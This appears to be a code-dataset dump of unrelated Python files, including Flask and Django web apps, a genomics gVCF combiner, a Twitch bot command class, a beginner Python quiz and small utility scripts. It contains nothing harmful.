render_template(\"user.html\")\n\n\n\n#REST API methods\nclass UserListResource(Resource):\n def get(self):\n users = User.query.all()\n return users_schema.dump(users)\n\n def post(self):\n new_user = User(\n name=request.json['name'].lower(),\n age=request.json['age'],\n # points=request.json['points'],\n address=request.json['address']\n )\n db.session.add(new_user)\n db.session.commit()\n return user_schema.dump(new_user)\nclass UserResource(Resource):\n def get(self, user_id):\n user = User.query.get_or_404(user_id)\n return user_schema.dump(user)\n\n def delete(self, user_id):\n user = User.query.get_or_404(user_id)\n db.session.delete(user)\n db.session.commit()\n return '', 204\n\napi.add_resource(UserResource, '/users/') \napi.add_resource(UserListResource, '/users') \n\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"305391584","text":"'''\nFile: main.py\n@author: Cheng-Hsuan Tsai\n'''\nimport sys\nimport argparse\n\ndef parse_stdin_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", help=\"Result File\", required=True)\n args = parser.parse_args()\n return args\n\ndef parser(filename):\n data = []\n lineNum = 0\n try:\n tempFile = open(filename)\n line = tempFile.readline()\n except:\n sys.stderr.write(\"[Error] filename \"+filename+\" is invailed.\")\n sys.exit()\n while 1:\n line = tempFile.readline()\n lineNum += 1\n if line:\n data.append([int(line.strip().split('\\t')[0]),int(line.strip().split('\\t')[1])])\n else:\n break\n if lineNum == 0:\n sys.stderr.write(\"[Error] input file is empty.\\n\")\n sys.exit()\n tempFile.close()\n return data\n\ndef statistics(data, filename):\n totalMS = 0\n totalSeqLen = 0\n for i in range(len(data)):\n totalMS += data[i][0]\n totalSeqLen += data[i][1]\n sys.stdout.write(\"Input Filename: %s \\n\"%(filename))\n sys.stdout.write(\"Total time: %.4f (secs) = %.2f (mins) = %.2f (hrs)\\n\"%((totalMS/1000.0), (totalMS/1000.0/60), (totalMS/1000.0/60/60)) )\n sys.stdout.write(\"Total len (nucleotide): %d \\n\"%(totalSeqLen))\n sys.stdout.write(\"Average time (secs):%.4f \\n\"%(totalMS/1000.0/len(data)))\n sys.stdout.write(\"Average len (nucleotide):%d \\n\"%(totalSeqLen/len(data)))\n\ndef main(argv):\n args = parse_stdin_args()\n data = parser(args.i)\n statistics(data, args.i)\n pass\n\nif __name__ == '__main__': main(sys.argv)\n","sub_path":"resultCal.py","file_name":"resultCal.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"274876480","text":"import config\nimport random\nimport requests\nimport json\n\ndef make_url_list(hosts_list, port, uri):\n ret_list = []\n for host, lport in zip(hosts_list, port):\n if lport == '80':\n ret_list.append('http://{}{}'.format(host, uri))\n else:\n ret_list.append('http://{}:{}{}'.format(host, lport, uri))\n ret_list = random.sample(ret_list, len(ret_list))\n return ret_list\n\ndef req_data(req_url, kind):\n ret_vals = requests.get(req_url)\n if kind == 'load':\n text_vals = ret_vals.text \n vals_list = json.loads(text_vals)\n else:\n vals_list = ret_vals\n return vals_list\n \ndef connect_lb(targ_list, err_msg, kind):\n num_targ = len(targ_list)\n for i in range(num_targ):\n try:\n print('try:{}'.format(targ_list[i]))\n vals_list = req_data(targ_list[i], kind)\n return vals_list\n except:\n if i 
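# Exercising the two REST resources above from a client (sketch; assumes the
# app is running locally on Flask's default port and the usual /users/<id>
# converter in the truncated route string):
import requests

base = "http://127.0.0.1:5000"
r = requests.post(f"{base}/users",
                  json={"name": "Ada", "age": 36, "address": "London"})
print(r.json())                                        # the new user, serialized
print(requests.get(f"{base}/users").json())            # full user list
print(requests.delete(f"{base}/users/1").status_code)  # 204 on success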
< num_targ:\n continue\n return err_msg\n","sub_path":"dashboard/api_lb.py","file_name":"api_lb.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"187835747","text":"#!/usr/bin/env python3 \r\n# -*- coding: utf-8 -*-\r\n# @Time : 2018/3/12 9:07\r\n# @Author : hyang\r\n# @File : 第一套.py\r\n# @Software: PyCharm\r\n# 第一套题\r\n# 1. 分别解释\"=\",\"==\",\"+=\"的含义(口述)\r\n\"\"\"\r\n答: = 是赋值语句\r\n ==是运算符判断两个对象的值是否相等\r\n +=是进行相加运算后,再赋值比如a+=1 等于a = a+1\r\n\"\"\"\r\n\r\n# 2. 两个变量值的关系?(口述)\r\n# n1 = 123456\r\n# n2 = n1\r\n\"\"\"\r\nn2值=n1值\r\nn2指向n1值的所在地址,即id(n2)=id(n1)\r\n\r\n\"\"\"\r\n# 3. 请写出 “路飞学城” 分别用 utf-8 和 gbk 编码所占的位数(口述)\r\n# utf-8占3个字节, gbk 编码占两个字节\r\n\r\n# 4. 简述Python中的几种数据类型(口述)\r\n\"\"\"\r\n数字型(整型,float),布尔型,字符串,列表,元祖,字典,集合\r\n\"\"\"\r\n# 5. 数据类型的可变与不可变分别有哪些?(口述)\r\n\"\"\"\r\n可变:value变化后,id没有变化(字典,集合,列表)\r\n不可变:value变化后,id变化(数字型(整型,float),布尔型,字符串,元祖)\r\n\"\"\"\r\n\r\n# 6. 元祖,列表,字典有没有长度的限制?(口述)\r\n\"\"\"\r\n没有限制\r\n\"\"\"\r\n\r\n# 7. 列表['alex','egon','yuan','wusir','666'](编程)\r\n# 1.把666替换成999\r\n# 2.获取\"yuan\"索引\r\n# 3.假设不知道前面有几个元素,分片得到最后的三个元素( [-3:] )\r\nli = ['alex','egon','yuan','wusir','666']\r\nli[-1] = '999'\r\nprint(li)\r\nprint(li.index('yuan'))\r\nprint(li[-3:])\r\n\r\n# 8. 将字符串“www.luffycity.com”给拆分成列表:li=['www','luffycity','com'] (编程)\r\ns = \"www.luffycity.com\"\r\nprint(s.split(\",\"))\r\n\r\n# 9. 对字典进行增删改查(编程)\r\n# {\"Development\":\"开发小哥\",\"OP\":\"运维小哥\",\"Operate\":\"运营小仙女\",\"UI\":\"UI小仙\r\n# 女\"}\r\nd = {\"Development\":\"开发小哥\",\"OP\":\"运维小哥\",\"Operate\":\"运营小仙女\",\"UI\":\"UI小仙女\"}\r\nd[\"artist\"]=\"美工\"\r\nd.setdefault(\"saler\",\"销售\")\r\nprint(d)\r\nd.pop(\"saler\")\r\nprint(d)\r\nd[\"artist\"]=\"美工小姐\"\r\nprint(d)\r\nprint(d[\"artist\"])\r\nprint(d.get(\"OP\"))\r\n\r\n# 10. 计算1+2+3...+98+99+100 (编程题)\r\nv_sum = 0\r\nfor i in range(101):\r\n v_sum += i\r\nprint(v_sum)\r\n\r\n# 11. 制作趣味模板程序(编程题)\r\n# 需求:等待用户输入名字、地点、爱好,根据用户的名字和爱好进行任意现实\r\n# 如:敬爱可爱的xxx,最喜欢在xxx地方干xxx\r\n\r\nname = input(\"user:\")\r\naddress = input(\"address:\")\r\nhobby = input(\"hobby:\")\r\ntemplate_str = \"敬爱可爱的{name},最喜欢在{address}地方干{hobby}\"\r\nprint(template_str.format(name=name, address=address, hobby=hobby))\r\n\r\n\r\n# 12. 写一个三次认证(编程)\r\n# 1. 
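# In connect_lb above, the guard `if i < num_targ` is always true inside
# `for i in range(num_targ)`, so a failing host always `continue`s and err_msg
# is never reached -- when every host is down the function silently returns
# None. A corrected sketch of the intended fallback (req_data as defined in
# the record):
def connect_lb_fixed(targ_list, err_msg, kind):
    for url in targ_list:
        try:
            return req_data(url, kind)  # first reachable host wins
        except Exception:
            continue                    # try the next host
    return err_msg                      # every host failed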
实现用户输入用户名和密码,当用户名为 seven 或 alex 且 密码为 123 时,显示登陆成功,否则登陆失败,失败时允许重复输入三次\r\ncount = 0\r\nwhile count < 3:\r\n user = input(\"user:\")\r\n pwd = input(\"password:\")\r\n if ( user == \"seven\" or user == \"alex\" ) and pwd == \"123\":\r\n print(\"登陆成功\")\r\n break\r\n else:\r\n print(\"登陆失败\")\r\n count += 1\r\nelse:\r\n print(\"重复输入三次错误\")\r\n\r\n","sub_path":"学员作业/第一套.py","file_name":"第一套.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"60300541","text":"from flask import Blueprint, current_app, request, render_template\nfrom ..models import User, Post\n\nmain = Blueprint(\"main\", __name__)\n\n\n@main.route(\"/home\")\n@main.route(\"/\")\ndef index():\n user = User.query.get(1)\n token = user.generate_token(30)\n print(token)\n print(user.check_token(token))\n page = request.args.get(\"page\", 1, type=int)\n posts = Post.query.order_by(Post.created_on.desc()).paginate(per_page=5, page=page)\n return render_template(\"index.html\", posts=posts, title=\"Home\")\n","sub_path":"cblog/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"443591888","text":"\"\"\"A work in progress pipeline to combine (g)VCFs into an alternate format\"\"\"\n\nimport hail as hl\nfrom hail.matrixtable import MatrixTable\nfrom hail.expr import ArrayExpression, StructExpression\nfrom hail.expr.expressions import expr_call, expr_array, expr_int32\nfrom hail.ir.matrix_ir import MatrixKeyRowsBy\nfrom hail.typecheck import typecheck\n\n\ndef transform_one(mt: MatrixTable) -> MatrixTable:\n \"\"\"transforms a gvcf into a form suitable for combining\"\"\"\n mt = mt.annotate_entries(\n # local (alt) allele index into global (alt) alleles\n LA=hl.range(0, hl.len(mt.alleles)),\n END=mt.info.END,\n BaseQRankSum=mt.info['BaseQRankSum'],\n ClippingRankSum=mt.info['ClippingRankSum'],\n MQ=mt.info['MQ'],\n MQRankSum=mt.info['MQRankSum'],\n ReadPosRankSum=mt.info['ReadPosRankSum'],\n )\n mt = mt.annotate_rows(\n info=mt.info.annotate(\n SB_TABLE=hl.array([\n hl.agg.sum(mt.entry.SB[0]),\n hl.agg.sum(mt.entry.SB[1]),\n hl.agg.sum(mt.entry.SB[2]),\n hl.agg.sum(mt.entry.SB[3]),\n ])\n ).select(\n \"MQ_DP\",\n \"QUALapprox\",\n \"RAW_MQ\",\n \"VarDP\",\n \"SB_TABLE\",\n ))\n mt = mt.transmute_entries(\n LGT=mt.GT,\n LAD=mt.AD[0:], # requiredness issues :'(\n LPL=mt.PL[0:],\n LPGT=mt.PGT)\n mt = mt.drop('SB', 'qual', 'filters')\n\n return mt\n\n\ndef merge_alleles(alleles) -> ArrayExpression:\n # alleles is tarray(tarray(tstruct(ref=tstr, alt=tstr)))\n return hl.rbind(hl.array(hl.set(hl.flatten(alleles))),\n lambda arr:\n hl.filter(lambda a: a.alt != '', arr)\n .extend(hl.filter(lambda a: a.alt == '', arr)))\n\n\ndef renumber_entry(entry, old_to_new) -> StructExpression:\n # global index of alternate (non-ref) alleles\n return entry.annotate(LA=entry.LA.map(lambda lak: old_to_new[lak]))\n\n\ndef combine(ts):\n # pylint: disable=protected-access\n tmp = ts.annotate(\n alleles=merge_alleles(ts.data.map(lambda d: d.alleles)),\n rsid=hl.find(hl.is_defined, ts.data.map(lambda d: d.rsid)),\n info=hl.struct(\n MQ_DP=hl.sum(ts.data.map(lambda d: d.info.MQ_DP)),\n QUALapprox=hl.sum(ts.data.map(lambda d: d.info.QUALapprox)),\n RAW_MQ=hl.sum(ts.data.map(lambda d: d.info.RAW_MQ)),\n VarDP=hl.sum(ts.data.map(lambda d: d.info.VarDP)),\n SB_TABLE=hl.array([\n hl.sum(ts.data.map(lambda d: d.info.SB_TABLE[0])),\n 
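# A correction for question 8 in the quiz record above: "www.luffycity.com"
# is dot-separated, so split on "." -- splitting on "," returns the whole
# string as a single element:
s = "www.luffycity.com"
assert s.split(",") == ["www.luffycity.com"]        # no comma to split on
assert s.split(".") == ["www", "luffycity", "com"]  # the intended result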
hl.sum(ts.data.map(lambda d: d.info.SB_TABLE[1])),\n hl.sum(ts.data.map(lambda d: d.info.SB_TABLE[2])),\n hl.sum(ts.data.map(lambda d: d.info.SB_TABLE[3]))\n ])))\n tmp = tmp.annotate(\n __entries=hl.bind(\n lambda combined_allele_index:\n hl.range(0, hl.len(tmp.data)).flatmap(\n lambda i:\n hl.cond(hl.is_missing(tmp.data[i].__entries),\n hl.range(0, hl.len(tmp.g[i].__cols))\n .map(lambda _: hl.null(tmp.data[i].__entries.dtype.element_type)),\n hl.bind(\n lambda old_to_new: tmp.data[i].__entries.map(lambda e: renumber_entry(e, old_to_new)),\n hl.array([0]).extend(\n hl.range(0, hl.len(tmp.data[i].alleles)).map(\n lambda j: combined_allele_index[tmp.data[i].alleles[j]]))))),\n hl.dict(hl.range(1, hl.len(tmp.alleles) + 1).map(\n lambda j: hl.tuple([tmp.alleles[j - 1], j])))))\n tmp = tmp.annotate_globals(__cols=hl.flatten(tmp.g.map(lambda g: g.__cols)))\n\n return tmp.drop('data', 'g')\n\n\ndef combine_gvcfs(mts):\n \"\"\"merges vcfs using multi way join\"\"\"\n\n # pylint: disable=protected-access\n def localize(mt):\n return mt._localize_entries('__entries', '__cols')\n\n def fix_alleles(alleles):\n return hl.rbind(\n alleles.map(lambda d: d.ref).fold(lambda s, t: hl.cond(hl.len(s) > hl.len(t), s, t), ''),\n lambda ref: hl.rbind(\n alleles.map(lambda a: hl.switch(hl.allele_type(a.ref, a.alt))\n .when('SNP', a.alt + ref[hl.len(a.alt):])\n .when('Insertion', a.alt + ref[hl.len(a.ref):])\n .when('Deletion', a.alt + ref[hl.len(a.ref):])\n .default(a.alt)),\n lambda alts: hl.array([ref]).extend(alts)\n ))\n\n def min_rep(locus, ref, alt):\n return hl.rbind(hl.min_rep(locus, [ref, alt]),\n lambda mr: hl.case()\n .when(alt == '', hl.struct(ref=ref[0:1], alt=alt))\n .when(locus == mr.locus, hl.struct(ref=mr.alleles[0], alt=mr.alleles[1]))\n .or_error(\"locus before and after minrep differ\"))\n\n mts = [hl.MatrixTable(MatrixKeyRowsBy(mt._mir, ['locus'], is_sorted=True)) for mt in mts]\n mts = [mt.annotate_rows(\n # now minrep'ed (ref, alt) allele pairs\n alleles=hl.bind(lambda ref, locus: mt.alleles[1:].map(lambda alt: min_rep(locus, ref, alt)),\n mt.alleles[0], mt.locus)) for mt in mts]\n ts = hl.Table._multi_way_zip_join([localize(mt) for mt in mts], 'data', 'g')\n combined = combine(ts)\n combined = combined.annotate(alleles=fix_alleles(combined.alleles))\n return hl.MatrixTable(\n MatrixKeyRowsBy(\n combined._unlocalize_entries('__entries', '__cols', ['s'])._mir,\n ['locus', 'alleles'],\n is_sorted=True))\n\n\n@typecheck(lgt=expr_call, la=expr_array(expr_int32))\ndef lgt_to_gt(lgt, la):\n \"\"\"A method for transforming Local GT and Local Alleles into the true GT\"\"\"\n return hl.call(la[lgt[0]], la[lgt[1]])\n\n\ndef summarize(mt):\n mt = hl.experimental.densify(mt)\n return mt.annotate_rows(info=hl.rbind(\n hl.agg.call_stats(lgt_to_gt(mt.LGT, mt.LA), mt.alleles),\n lambda gs: hl.struct(\n # here, we alphabetize the INFO fields by GATK convention\n AC=gs.AC,\n AF=gs.AF,\n AN=gs.AN,\n BaseQRankSum=hl.median(hl.agg.collect(mt.entry.BaseQRankSum)),\n ClippingRankSum=hl.median(hl.agg.collect(mt.entry.ClippingRankSum)),\n DP=hl.agg.sum(mt.entry.DP),\n MQ=hl.median(hl.agg.collect(mt.entry.MQ)),\n MQRankSum=hl.median(hl.agg.collect(mt.entry.MQRankSum)),\n MQ_DP=mt.info.MQ_DP,\n QUALapprox=mt.info.QUALapprox,\n RAW_MQ=mt.info.RAW_MQ,\n ReadPosRankSum=hl.median(hl.agg.collect(mt.entry.ReadPosRankSum)),\n SB_TABLE=mt.info.SB_TABLE,\n VarDP=mt.info.VarDP,\n )))\n\ndef finalize(mt):\n return mt.drop('BaseQRankSum', 'ClippingRankSum', 'MQ', 'MQRankSum', 'ReadPosRankSum')\n\n# NOTE: these are just 
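# What lgt_to_gt above computes, with the Hail machinery stripped away: local
# genotype indices are looked up in LA, the local-to-global allele map
# (toy values):
LA = [0, 2]                  # this sample carries global alleles 0 and 2
LGT = (0, 1)                 # locally called 0/1
GT = tuple(LA[i] for i in LGT)
assert GT == (0, 2)          # the true global genotype is 0/2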
@chrisvittal's notes on how gVCF fields are combined\n# some of it is copied from GenomicsDB's wiki.\n# always missing items include MQ, HaplotypeScore, InbreedingCoeff\n# items that are dropped by CombineGVCFs and so set to missing are MLEAC, MLEAF\n# Notes on info aggregation, The GenomicsDB wiki says the following:\n# The following operations are supported:\n# \"sum\" sum over valid inputs\n# \"mean\"\n# \"median\"\n# \"element_wise_sum\"\n# \"concatenate\"\n# \"move_to_FORMAT\"\n# \"combine_histogram\"\n#\n# Operations for the fields\n# QUAL: set to missing\n# INFO {\n# BaseQRankSum: median, # NOTE : move to format for combine\n# ClippingRankSum: median, # NOTE : move to format for combine\n# DP: sum\n# ExcessHet: median, # NOTE : this can also be dropped\n# MQ: median, # NOTE : move to format for combine\n# MQ_DP: sum,\n# MQ0: median,\n# MQRankSum: median, # NOTE : move to format for combine\n# QUALApprox: sum,\n# RAW_MQ: sum\n# ReadPosRankSum: median, # NOTE : move to format for combine\n# SB_TABLE: elementwise sum, # NOTE: after being moved from FORMAT as SB\n# VarDP: sum\n# }\n# FORMAT {\n# END: move from INFO\n# }\n#\n# The following are Truncated INFO fields for the specific VCFs this tool targets\n# ##INFO=\n# ##INFO=\n# ##INFO=\n# ##INFO=\n# ##INFO=\n# ##INFO=\n# ##INFO=\n# ##INFO=\n# ##INFO=\n# ##INFO=\n# ##INFO=\n# ##INFO=\n#\n# As of 2/15/19, the schema returned by the combiner is as follows:\n# ----------------------------------------\n# Global fields:\n# None\n# ----------------------------------------\n# Column fields:\n# 's': str\n# ----------------------------------------\n# Row fields:\n# 'locus': locus\n# 'alleles': array\n# 'rsid': str\n# 'info': struct {\n# MQ_DP: int32,\n# QUALapprox: int32,\n# RAW_MQ: float64,\n# VarDP: int32,\n# SB_TABLE: array\n# }\n# ----------------------------------------\n# Entry fields:\n# 'LAD': array\n# 'DP': int32\n# 'GQ': int32\n# 'LGT': call\n# 'MIN_DP': int32\n# 'LPGT': call\n# 'PID': str\n# 'LPL': array\n# 'LA': array\n# 'END': int32\n# 'BaseQRankSum': float64\n# 'ClippingRankSum': float64\n# 'MQ': float64\n# 'MQRankSum': float64\n# 'ReadPosRankSum': float64\n# ----------------------------------------\n# Column key: ['s']\n# Row key: ['locus', 'alleles']\n# ----------------------------------------\n","sub_path":"hail/python/hail/experimental/vcf_combiner.py","file_name":"vcf_combiner.py","file_ext":"py","file_size_in_byte":9942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"53900531","text":"import sys\nimport psycopg2 as psycopg2\nimport os\n\ndef connect_to_server():\n return psycopg2.connect(dbname=os.environ.get('DB_NAME'),\n host=os.environ.get('DB_HOST'),\n port=os.environ.get('DB_PORT'),\n user=os.environ.get('DB_USER'),\n password=os.environ.get('DB_PASSWORD')\n )\n\n# Connect to DB\nconn = connect_to_server()\n\n# Create a cursor\ncur = conn.cursor()\n\n# Execute queries\nif (sys.argv):\n\tTZ = sys.argv[1]\n\tcur.execute(\"set role to dude; select dude.daily_update_reruns_f(timezone=>%s) as job_run_code;\",(TZ,))\nelse:\n\tcur.execute(\"set role to dude; select dude.daily_update_reruns_f() as job_run_code;\")\n\n# Fetch Results\nresults = cur.fetchall()\n\n# Save results to a file\nif not(results[0][0] is None):\n\twith open('dude-rerun-jobs.sh', 'w') as f:\n\t\tfor item in results:\n\t\t\tf.write(\"%s\\n\" % item)\n\tf.close()\n\n# Close connection to 
DB\nconn.close()\n","sub_path":"dude-reruns.py","file_name":"dude-reruns.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"531873849","text":"import asyncio\nimport inspect\n\nclass Command:\n \"\"\" A command class to provide methods we can use with it \"\"\"\n\n def __init__(self, bot, comm, desc='', alias=[], admin=False, unprefixed=False, listed=True):\n self.comm = comm\n self.desc = desc\n self.alias = alias\n self.admin = admin\n self.listed = listed\n self.unprefixed = unprefixed\n self.subcommands = {}\n self.bot = bot\n bot.commands[comm] = self\n for a in self.alias:\n bot.commands[a] = self\n\n def subcommand(self, *args, **kwargs):\n \"\"\" Create subcommands \"\"\"\n return SubCommand(self, *args, **kwargs)\n\n def __call__(self, func):\n \"\"\" Make it able to be a decorator \"\"\"\n\n self.func = func\n\n return self\n\n @asyncio.coroutine\n def run(self, message):\n \"\"\" Does type checking for command arguments \"\"\"\n args = message.content[len(self.bot.prefix):].split(\" \")[1:]\n\n args_name = inspect.getfullargspec(self.func)[0][1:]\n\n if len(args) > len(args_name):\n args[len(args_name)-1] = \" \".join(args[len(args_name)-1:])\n\n args = args[:len(args_name)]\n\n ann = self.func.__annotations__\n\n for x in range(0, len(args_name)):\n try:\n v = args[x]\n k = args_name[x]\n\n if not type(v) == ann[k]:\n try:\n v = ann[k](v)\n\n except Exception:\n raise TypeError(\"Invalid type: got {}, {} expected\"\n .format(ann[k].__name__, v.__name__))\n\n args[x] = v\n except IndexError:\n break\n\n if len(list(self.subcommands.keys())) > 0:\n try:\n subcomm = args.pop(0).split(\" \")[0]\n except Exception:\n yield from self.func(message, *args)\n return\n if subcomm in self.subcommands.keys():\n c = message.content.split(\" \")\n c.pop(1)\n message.content = \" \".join(c)\n yield from self.subcommands[subcomm].run(message)\n\n else:\n yield from self.func(message, *args)\n\n else:\n try:\n yield from self.func(message, *args)\n except TypeError as e:\n if len(args) < len(args_name):\n raise Exception(\"Not enough arguments for {}, required arguments: {}\"\n .format(self.comm, \", \".join(args_name)))\n else:\n raise e\n\nclass SubCommand(Command):\n \"\"\" Subcommand class \"\"\"\n\n def __init__(self, parent, comm, desc, *alias):\n self.comm = comm\n self.parent = parent\n self.subcommands = {}\n parent.subcommands[comm] = self\n for a in alias:\n parent.subcommands[a] = self\n","sub_path":"asynctwitch/dataclasses.py","file_name":"dataclasses.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"140364726","text":"import logging\nfrom django.shortcuts import get_object_or_404, get_list_or_404, render\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom django.template import loader\nfrom django.utils import timezone\n\nfrom ..models import *\nfrom ..forms import MarkingForm\n\nfrom .helper import get_next_exercise_number\n\nfrom datetime import datetime, time, timedelta\n\nlogger = logging.getLogger('django')\n\n\ndef index(request):\n return render(request, 'kateapp/home.html')\n\ndef grading_scheme(request):\n return render(request, 'kateapp/grading_scheme.html')\n\ndef course_list(request, letter_yr):\n courses_term1 = list(Courses.objects.filter(courses_classes__letter_yr=letter_yr, courses_term__term=1).order_by('code'))\n courses_term2 = 
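# The type coercion inside Command.run above, in isolation: argument strings
# are converted through the handler's parameter annotations:
import inspect

def handler(message, count: int, name: str):
    return count, name

raw_args = ["3", "bob"]
arg_names = inspect.getfullargspec(handler)[0][1:]   # skip `message`
ann = handler.__annotations__
coerced = [v if isinstance(v, ann[k]) else ann[k](v)
           for k, v in zip(arg_names, raw_args)]
assert coerced == [3, "bob"]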
list(Courses.objects.filter(courses_classes__letter_yr=letter_yr, courses_term__term=2).order_by('code'))\n courses_term3 = list(Courses.objects.filter(courses_classes__letter_yr=letter_yr, courses_term__term=3).order_by('code'))\n context = {\n 'letter_yr': letter_yr,\n 'courses_term1': courses_term1,\n 'courses_term2': courses_term2,\n 'courses_term3': courses_term3,\n }\n return render(request, 'kateapp/course_list.html', context)\n\n\ndef course(request, code):\n course = get_object_or_404(Courses, pk=str(code))\n terms = get_list_or_404(Term, courses_term__code=str(code))\n terms.sort(key=lambda x: x.term)\n login = request.user.get_username()\n person = get_object_or_404(People, login=login)\n teacher = person.tutor == None\n exercises = Exercises.objects.filter(code=str(code))\n next_number = get_next_exercise_number(exercises)\n exercises_resources = []\n for exercise in list(exercises):\n resources = list(Resource.objects.filter(\n exercises_resource__exercise__code=exercise.code, exercises_resource__exercise__number=exercise.number))\n exercises_resources.append((exercise, resources))\n note = list(Courses_Resource.objects.filter(code=code, course_resource_type='NOTE').order_by('release_date'))\n exercise = list(Courses_Resource.objects.filter(code=code, course_resource_type='PROBLEM').order_by('release_date'))\n url = list(Courses_Resource.objects.filter(code=code, course_resource_type='URL').order_by('release_date'))\n panopto = list(Courses_Resource.objects.filter(code=code, course_resource_type='PANOPTO').order_by('release_date'))\n piazza = list(Courses_Resource.objects.filter(code=code, course_resource_type='PIAZZA').order_by('release_date'))\n homepage = list(Courses_Resource.objects.filter(code=code, course_resource_type='HOMEPAGE').order_by('release_date'))\n resource = (note, exercise, url, panopto, piazza, homepage)\n context = {\n 'course': course,\n 'terms': terms,\n 'teacher': teacher,\n 'exercises_resources': exercises_resources,\n 'next_number': next_number,\n 'NO': Exercises.NO,\n 'resource': resource,\n 'empty': (resource == ([], [], [], [], [], [])),\n }\n return render(request, 'kateapp/course.html', context)\n","sub_path":"KATE/kateapp/views/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"545764137","text":"from nodeupgrade.log import UpgradeLog\nlogger = UpgradeLog()\n\n\nclass Activity:\n\n def __init__(self, **kwargs):\n\n self.check = True\n keychain = ('command', 'node', 'expect', 'method', 'lineno', 'activity', 'instruction', 'result')\n for key in keychain:\n if key in kwargs.keys():\n pass\n else:\n kwargs[key] = ''\n self.check = False\n self.command = str(kwargs['command'])\n self.node = str(kwargs['node'])\n self.expect = str(kwargs['expect'])\n self.method = str(kwargs['method'])\n self.lineno = str(kwargs['lineno'])\n self.activity = str(kwargs['activity'])\n self.instruction = str(kwargs['instruction'])\n self.result = str(kwargs['result'])\n self.output = ''\n\n def show(self):\n logger.info('Line number:\\t' + self.lineno)\n logger.info('Activity:\\t' + self.activity)\n logger.info('Node:\\t' + self.node)\n logger.info('Instruction:\\t' + self.instruction)\n logger.info('Result:\\t' + self.result)\n\n def execute(self, nodelist):\n\n self.show()\n if self.method == 'manual':\n return self.manual()\n else:\n flag = nodelist[self.node].execute(self.command)\n self.output = nodelist[self.node].output\n 
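# The six near-identical Courses_Resource queries in the course view above
# could be collapsed into one comprehension over the type tags (sketch using
# the model and `code` variable from the record, preserving the tuple order
# the template expects):
RESOURCE_TYPES = ("NOTE", "PROBLEM", "URL", "PANOPTO", "PIAZZA", "HOMEPAGE")
resource = tuple(
    list(Courses_Resource.objects.filter(
        code=code, course_resource_type=t).order_by("release_date"))
    for t in RESOURCE_TYPES
)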
self.expect.encode(\"utf-8\")\n if flag:\n if self.method == 'pas':\n return self.pas()\n if self.method == 'regex':\n return self.regex()\n if self.method == 'onaji':\n return self.onaji()\n else:\n logger.info('Command execute failed', '\\033[1;31;40m')\n return False\n\n def manual(self):\n logger.info('Activity: ' + self.activity + ' Need human intervention', '\\033[1;33;40m')\n return False\n\n def pas(self):\n logger.info('Activity: ' + self.activity + ' Nothing to check', '\\033[1;32;40m')\n return True\n\n def regex(self):\n if self.output.find(self.expect) != -1:\n logger.info('Activity: ' + self.activity + ' ... successful', '\\033[1;32;40m')\n return True\n else:\n logger.info('Result verification failed', '\\033[1;31;40m')\n logger.info('Expect: ' + self.expect)\n logger.info('Got: ' + self.output)\n return False\n\n def onaji(self):\n if self.output == self.expect:\n logger.info('Activity: ' + self.activity + ' ... successful', '\\033[1;32;40m')\n return True\n else:\n logger.info('Result verification failed', '\\033[1;31;40m')\n logger.info('Expect: ' + self.expect)\n logger.info('Got: ' + self.output)\n return False\n\n\n\n","sub_path":"nodeupgrade/activity.py","file_name":"activity.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"443784443","text":"\nimport time\n\nimport numpy as np\nimport pandas as pd\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nplt.style.use(['seaborn', 'ggplot', 'seaborn-white'])\n\nimport scipy\nfrom scipy import stats\nfrom scipy.io import arff\n\nfrom itertools import cycle, islice, combinations_with_replacement, product\n\nimport sklearn\n\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder, StandardScaler, MinMaxScaler, RobustScaler\n\nfrom sklearn.model_selection import train_test_split, cross_val_score, KFold, StratifiedKFold\n\nfrom sklearn.metrics import r2_score, mean_squared_error\nfrom sklearn.metrics import confusion_matrix, classification_report, accuracy_score\n\n# regressors\nfrom sklearn.linear_model import LinearRegression as lr, SGDRegressor as sgdr, ElasticNet as enr\nfrom sklearn.linear_model import Ridge as rr, RidgeCV as rcvr, Lasso as lassor, LassoCV as lassocvr\nfrom sklearn.neighbors import KNeighborsRegressor as knnr\nfrom sklearn.tree import DecisionTreeRegressor as dtr\nfrom sklearn.svm import SVR as svr\nfrom sklearn.ensemble import RandomForestRegressor as rfr, AdaBoostRegressor as abr, GradientBoostingRegressor as gbr\n\n# classifiers\nfrom sklearn.linear_model import SGDClassifier as sgdc, LogisticRegression as logitc, RidgeClassifier as rc\nfrom sklearn.neighbors import KNeighborsClassifier as knnc, NearestCentroid as ncc, RadiusNeighborsClassifier as rnc\nfrom sklearn.tree import DecisionTreeClassifier as dtc\nfrom sklearn.svm import SVC as svc\nfrom sklearn.naive_bayes import GaussianNB as gnbc, BernoulliNB as bnbc, MultinomialNB as mnbc\nfrom sklearn.ensemble import RandomForestClassifier as rfc, GradientBoostingClassifier as gbc\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as ldac\n\n# clustering\nfrom sklearn.metrics import silhouette_score\nfrom sklearn.neighbors import 